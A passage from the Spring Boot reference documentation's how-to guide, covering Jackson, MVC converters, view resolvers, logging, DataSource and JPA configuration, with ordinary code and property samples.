`XmlMapper` instances using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. 
These features are described in six enums in\nJackson which map onto properties in the environment:\n\n|===\n|Jackson enum|Environment property\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion=always\\|non_null\\|non_absent\\|non_default\\|non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` doesn't have to match the case of the\ncorresponding enum constant which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean, and will apply to any mappers created\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered and\nBoot's own customizer has an order of 0, allowing additional customization to be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` will be automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary`, or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that in either case this\nwill disable all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter` then\nthey will replace the default value in the MVC configuration. Also, a convenience bean is\nprovided of type `HttpMessageConverters` (always available if you use the default MVC\nconfiguration) which has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee also the _<<howto-customize-the-responsebody-rendering>>_ section and the\n{sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by simply adding beans of\nthat type in a Spring Boot context. If a bean you add is of a type that would have been\nincluded by default anyway (like `MappingJackson2HttpMessageConverter` for JSON\nconversions) then it will replace the default value. 
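\n\nFor instance, here is a sketch of contributing one additional converter (Spring's\nexisting `BufferedImageHttpMessageConverter` is used purely for illustration):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class ConverterConfiguration {\n\n\t\t\/\/ an additional converter; the default Jackson-based JSON converter\n\t\t\/\/ is left untouched\n\t\t@Bean\n\t\tpublic BufferedImageHttpMessageConverter bufferedImageConverter() {\n\t\t\treturn new BufferedImageHttpMessageConverter();\n\t\t}\n\n\t}\n----\n\n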
A convenience bean is provided of\ntype `HttpMessageConverters` (always available if you use the default MVC configuration)\nwhich has some useful methods to access the default and user-enhanced message converters\n(useful, for example, if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurerAdapter` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method, but unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nthen you can take control completely and do everything manually using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, as well as the location to which intermediate data is stored (e.g., to the `\/tmp`\ndirectory) and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. If you want to specify that files be\nunlimited, for example, set the `spring.http.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch off the Spring MVC DispatcherServlet\nSpring Boot wants to serve all content from the root of your application `\/` down. If you\nwould rather map your own servlet to that URL you can do it, but of course you may lose\nsome of the other Boot MVC features. To add your own servlet and map it to the root\nresource just declare a `@Bean` of type `Servlet` and give it the special bean name\n`dispatcherServlet`. (You can also create a bean of a different type with that name if\nyou want to switch it off and not replace it.)\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. This will leave all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. 
Spring Boot, on the\nother hand, installs one or two for you depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so if you are\nadding your own you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` with bean id '`defaultViewResolver`'. This one locates\n physical resources that can be rendered using the `DefaultServlet` (e.g. static\n resources and JSP pages if you are using those). It applies a prefix and a suffix to the\n view name and then looks for a physical resource with that path in the servlet context\n (defaults are both empty, but accessible for external configuration via\n `spring.mvc.view.prefix` and `spring.mvc.view.suffix`). It can be overridden by providing a\n bean of the same type.\n* A `BeanNameViewResolver` with id '`beanNameViewResolver`'. This is a useful member of the\n view resolver chain and will pick up any beans with the same name as the `View` being\n resolved. It shouldn't be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` with id '`viewResolver`' is only added if there *are*\n actually beans of type `View` present. This is a '`master`' resolver, delegating to all\n the others and attempting to find a match to the '`Accept`' HTTP header sent by the\n client. There is a useful\n https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`]\n that you might like to study to learn more, and also look at the source code for detail.\n You can switch off the auto-configured\n `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf you will also have a `ThymeleafViewResolver` with id\n '`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\n prefix and suffix (externalized to `spring.thymeleaf.prefix` and\n `spring.thymeleaf.suffix`, defaults '`classpath:\/templates\/`' and '`.html`'\n respectively). It can be overridden by providing a bean of the same name.\n* If you use FreeMarker you will also have a `FreeMarkerViewResolver` with id\n '`freeMarkerViewResolver`'. It looks for resources in a loader path (externalized to\n `spring.freemarker.templateLoaderPath`, default '`classpath:\/templates\/`') by\n surrounding the view name with a prefix and suffix (externalized to `spring.freemarker.prefix`\n and `spring.freemarker.suffix`, with empty and '`.ftl`' defaults respectively). It can\n be overridden by providing a bean of the same name.\n* If you use Groovy templates (actually if groovy-templates is on your classpath) you will\n also have a `GroovyMarkupViewResolver` with id '`groovyMarkupViewResolver`'. It\n looks for resources in a loader path by surrounding the view name with a prefix and\n suffix (externalized to `spring.groovy.template.prefix` and\n `spring.groovy.template.suffix`, defaults '`classpath:\/templates\/`' and '`.tpl`'\n respectively). 
It can be overridden by providing a bean of the same name.\n\nCheck out {sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`],\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`],\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`] and\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor more details.\n\n\n\n[[howto-use-thymeleaf-3]]\n=== Use Thymeleaf 3\nBy default, `spring-boot-starter-thymeleaf` uses Thymeleaf 2.1. If you are using the\n`spring-boot-starter-parent`, you can use Thymeleaf 3 by overriding the\n`thymeleaf.version` and `thymeleaf-layout-dialect.version` properties, for example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<thymeleaf.version>3.0.2.RELEASE<\/thymeleaf.version>\n\t\t<thymeleaf-layout-dialect.version>2.1.1<\/thymeleaf-layout-dialect.version>\n\t<\/properties>\n----\n\nNOTE: If you are managing dependencies yourself, look at `spring-boot-dependencies` for\nthe list of artifacts that are related to those two versions.\n\nTo avoid a warning message about the HTML 5 template mode being deprecated and the HTML\ntemplate mode being used instead, you may also want to explicitly configure\n`spring.thymeleaf.mode` to be `HTML`, for example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.thymeleaf.mode: HTML\n----\n\nPlease refer to the\n{github-code}\/spring-boot-samples\/spring-boot-sample-web-thymeleaf3[Thymeleaf 3 sample] to\nsee this in action.\n\nIf you are using any of the other auto-configured Thymeleaf Extras (Spring Security,\nData Attribute, or Java 8 Time) you should also override each of their versions to one\nthat is compatible with Thymeleaf 3.0.\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather than `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true` on the\napplication's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP clients\n\n\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to use a proxy\nAs described in <<spring-boot-features.adoc#boot-features-restclient-customization>>,\na `RestTemplateCustomizer` can be used with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. 
Here's an example of configuring\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`.\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, of\nwhich there are many implementations to choose from. To use http:\/\/logback.qos.ch[Logback]\nyou need to include it and `jcl-over-slf4j` (which implements the Commons Logging API) on\nthe classpath. The simplest way to do that is through the starters which all depend on\n`spring-boot-starter-logging`. For a web application you only need\n`spring-boot-starter-web` since it depends transitively on the logging starter. For\nexample, using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers\nthen you can do that in `application.properties` using the \"logging.level\" prefix, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to log to (in addition to the console) using\n\"logging.file\".\n\nTo configure the more fine-grained settings of a logging system you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default Spring Boot\npicks up the native configuration from its default location for the system (e.g.\n`classpath:logback.xml` for Logback), but you can set the location of the config file\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for logging\nIf you put a `logback.xml` in the root of your classpath it will be picked up from\nthere\n(or `logback-spring.xml` to take advantage of the templating features provided by Boot).\nSpring Boot provides a default base configuration that you can include if you just\nwant to set levels, e.g.\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at that `base.xml` in the spring-boot jar, you will see that it uses\nsome useful System properties which the `LoggingSystem` takes care of creating for you.\nThese are:\n\n* `${PID}` the current process ID.\n* `${LOG_FILE}` if `logging.file` was set in Boot's external configuration.\n* `${LOG_PATH}` if `logging.path` was set (representing a directory for\n log files to live in).\n* `${LOG_EXCEPTION_CONVERSION_WORD}` if `logging.exception-conversion-word` was set in\n Boot's external configuration.\n\nSpring Boot also provides some nice ANSI colour terminal output on a console (but not in\na log file) using a custom Logback converter. 
See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath you should be able to configure Logback with\n`logback.groovy` as well (it will be given preference if present).\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for file-only output\nIf you want to disable console logging and write output only to a file you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you are using the starters for\nassembling dependencies that means you have to exclude Logback and then include Log4j 2\ninstead. If you aren't using the starters then you need to provide `jcl-over-slf4j`\n(at least) in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes, e.g. in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The use of the Log4j starters gathers together the dependencies for common logging\nrequirements (e.g. including having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the Actuator Log4j 2 samples for more detail and to see it in\naction.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. 
To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a custom DataSource\nTo configure your own `DataSource` define a `@Bean` of that type in your configuration.\nSpring Boot will reuse your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can easily bind your\n`DataSource` to the environment (see\n<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>).\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the url, the\nusername and the pool size, these settings will be bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> will also happen\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nYou can apply the same principle if you are configuring a custom JNDI `DataSource`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tJndiDataSourceLookup dataSourceLookup = new JndiDataSourceLookup();\n\t\treturn dataSourceLookup.getDataSource(\"java:comp\/env\/jdbc\/YourDS\");\n\t}\n----\n\nSpring Boot also provides a utility builder class `DataSourceBuilder` that can be used to\ncreate one of the standard data sources (if it is on the classpath). The builder can\ndetect the one to use based on what's available on the classpath. It also auto detects the\ndriver based on the JDBC url.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all that is needed really is the connection\ninformation; pool-specific settings can also be provided, check the implementation that\nis going to be used at runtime for more details.\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nThere is a catch however. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (The `DataSource` interface doesn't expose any property). Also, if\nyou happen to _only_ have Hikari on the classpath, this basic setup will not work because\nHikari has no `url` parameter (but a `jdbcUrl` parameter). 
You will have to rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You won't be able to change the implementation\nat runtime but the list of options will be explicit.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you, that is,\nproviding a default embedded database (with a sensible username and password) if no url\nis provided. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` so you could just as well inject the one Spring Boot creates\nautomatically. However, that would split your configuration into two namespaces: url,\nusername, password, type and driver on `spring.datasource` and the rest on your custom\nnamespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _on a par_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the same\nnamespace. Because `DataSourceProperties` is taking care of the `url`\/`jdbcUrl`\ntranslation for you, you can configure it like this:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nwill have no effect. In practice the builder will be initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee _<<spring-boot-features.adoc#boot-features-configure-datasource>>_ in the\n'`Spring Boot features`' section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource` beans\n`@Primary`, as various auto-configurations down the road expect to be able to get one by\ntype.\n\nIf you create your own `DataSource`, the auto-configuration will back off. In the example\nbelow, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `fooDataSourceProperties` has to be flagged `@Primary` so that the database\ninitializer feature uses your copy (should you use that).\n
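\nThe included example above follows this general shape; as a rough sketch (the\n`app.datasource.foo\/bar` prefixes and bean names are illustrative, not prescriptive):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@Primary\n\t@ConfigurationProperties(\"app.datasource.foo\")\n\tpublic DataSourceProperties fooDataSourceProperties() {\n\t\treturn new DataSourceProperties();\n\t}\n\n\t@Bean\n\t@Primary\n\tpublic DataSource fooDataSource() {\n\t\t\/\/ builds the pool from the bound properties (url\/jdbcUrl handled for you)\n\t\treturn fooDataSourceProperties().initializeDataSourceBuilder().build();\n\t}\n\n\t@Bean\n\t@ConfigurationProperties(\"app.datasource.bar\")\n\tpublic DataSource barDataSource() {\n\t\treturn DataSourceBuilder.create().build();\n\t}\n----\n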
\nBoth data sources are also bound for advanced customizations. For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.foo.type=com.zaxxer.hikari.HikariDataSource\n\tapp.datasource.foo.maximum-pool-size=30\n\n\tapp.datasource.bar.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.bar.username=dbuser\n\tapp.datasource.bar.password=dbpass\n\tapp.datasource.bar.max-total=30\n----\n\nOf course, you can apply the same concept to the secondary `DataSource` as well:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThis final example configures two data sources on custom namespaces with the same logic\nas Spring Boot would apply in auto-configuration.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors\nfor you. Spring Boot will handle all of that for you as long as those `@Repositories`\nare included in the same package (or a sub-package) as your `@EnableAutoConfiguration`\nclass.\n\nFor many applications all you will need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to handle your\n`@Entity` objects. Examples are in the {github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample]\nor the {github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity definitions from Spring configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA properties\nSpring Data JPA already provides some vendor-independent configuration options (e.g.\nfor SQL logging) and Spring Boot exposes those, and a few more for Hibernate as external\nconfiguration properties. Some of them are automatically detected according to the context\nso you shouldn't have to set them.\n\n`spring.jpa.hibernate.ddl-auto` is a special case in that it has different defaults\ndepending on whether you are using an embedded database (`create-drop`) or not (`none`).\nThe dialect to use is also automatically detected based on the current `DataSource` but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. 
Several databases have more than one `Dialect` and this may not suit your needs.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate figure\nthings out or set the dialect using the `spring.jpa.database-platform` property.\n\nThe most common options to set are:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition all properties in `+spring.jpa.properties.*+` are passed through as normal JPA\nproperties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nSpring Boot provides a consistent naming strategy regardless of the Hibernate generation\nthat you are using. If you are using Hibernate 4, you can customize it using\n`spring.jpa.hibernate.naming.strategy`; Hibernate 5 defines `Physical` and `Implicit`\nnaming strategies.\n\nSpring Boot configures `SpringPhysicalNamingStrategy` by default. This implementation\nprovides the same table structure as Hibernate 4: all dots are replaced by underscores and\ncamel case is broken up with underscores as well. By default, all table names are generated\nin lower case but it is possible to override that flag if your schema requires it.\n\nConcretely, a `TelephoneNumber` entity will be mapped to the `telephone_number` table.\n\nIf you'd rather use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager based on the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you will need to define a new one\nbecause otherwise the presence of the second bean of that type will switch off the\ndefault. To make it easy to do that you can use the convenient `EntityManagerFactoryBuilder`\nprovided by Spring Boot, or if you prefer you can just use the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM.\n\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. 